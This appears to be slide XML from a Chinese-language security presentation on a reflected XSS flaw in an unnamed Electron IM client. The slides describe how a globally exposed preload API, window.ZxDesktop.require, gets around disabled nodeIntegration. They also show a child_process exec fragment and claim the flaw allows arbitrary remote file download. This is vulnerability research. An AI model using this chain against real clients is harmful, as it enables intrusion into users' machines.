            <p:cNvPr id="20" name="文本框 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAD47E56-185F-9756-7DF3-C41F2EFD9CB1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="306086" y="5751511"/>
              <a:ext cx="4049331" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr>
                <a:defRPr sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>某</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>IM</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>Electron</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>）客户端存在反射</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>XSS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>漏洞</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="图片 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A33D3A-B977-CE70-B2A2-758C37564415}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4848137" y="1868377"/>
              <a:ext cx="6921500" cy="431800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="文本框 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A10B075-1EF7-13F8-C377-D376D9EC2DBF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4780902" y="2376805"/>
              <a:ext cx="7279712" cy="1077218"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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禁用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>nodeIntegration</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>，无法使用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>require(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>child_process</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>).exec(...);</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>执行</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>命令。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>\resources\app\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>\inject\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>preload.js</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>中</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>找到了自定义</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>，通过</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>window.ZxDesktop</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ZxDesktop</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>方式使得全局可用。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="图片 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DDC8203-CBD9-C580-B0B6-C397D57D0009}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8116042" y="3602061"/>
              <a:ext cx="3568700" cy="2032000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="文本框 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC64DF89-15C6-AC79-2FE0-1E09DB3633A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4931064" y="5751511"/>
              <a:ext cx="6838574" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>使用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ZxDesktop.require</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>语法</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>来调用不同功能的模块。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="图片 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E74AA0AD-B920-253C-5556-E75665195BBF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="131386" y="1851109"/>
              <a:ext cx="4398730" cy="888717"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="图片 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F17F2F9C-C6A9-3CCE-83A3-2B77BD988D95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4931063" y="3602061"/>
              <a:ext cx="2929247" cy="2032000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2345027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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>IM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>客户端应用</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CA1090B0-262D-7542-F646-E8F290CAF998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="187523" y="1920645"/>
            <a:ext cx="11929228" cy="3729869"/>
            <a:chOff x="131386" y="1923263"/>
            <a:chExt cx="11929228" cy="3729869"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="组合 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86E314FF-F13D-2EF3-3C53-B23C9CD9F535}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="131386" y="2366818"/>
              <a:ext cx="3674680" cy="3286314"/>
              <a:chOff x="733081" y="2079063"/>
              <a:chExt cx="3674680" cy="3286314"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="17" name="图片 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDDD4B50-D223-2657-F9F3-1FA193891DAF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="733081" y="2079063"/>
                <a:ext cx="3665314" cy="1699559"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="18" name="图片 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9798D869-1C50-8025-C0A1-E503BBF5299A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="733081" y="4051679"/>
                <a:ext cx="3674680" cy="1313698"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{700540E7-2B20-3C87-678F-33687E8079FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8035404" y="2044650"/>
              <a:ext cx="4025210" cy="1815882"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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构建如下</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>JS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>语法即可实现任意远程文件下载。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
